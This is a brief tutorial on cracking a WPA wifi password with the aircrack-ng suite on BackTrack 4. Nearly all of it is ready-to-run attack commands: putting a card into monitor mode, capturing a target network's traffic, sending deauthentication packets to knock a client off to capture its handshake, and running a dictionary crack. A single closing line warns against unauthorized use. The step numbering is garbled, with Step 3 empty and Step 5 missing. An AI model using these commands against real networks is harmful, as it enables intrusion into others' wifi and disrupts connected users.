The following tutorial is based on Back|Track 4.
Suppose the wifi channel is 5, the BSSID MAC is 00:24:B2:A0:51:14 and the client MAC is 00:14:17:94:90:0D. Make sure the client is connecting to the wifi router when you are performing Step 1 to 4.
Step 1 :
apt-get install wpa-wordlist
Step 2 :
airmon-ng start wlan0
Step 3 :
Step 4 :
airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0
aireplay-ng --deauth 10 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
To get the handshake when done and then go to next step. If not, do it again until you get the handshake.
Step 6 :
aircrack-ng output-01.cap -w /pentest/password/wordlist/wpa.txt
WARNING : Do NOT crack any wifi router without authorization or you may be put into jail.
That's all. See you!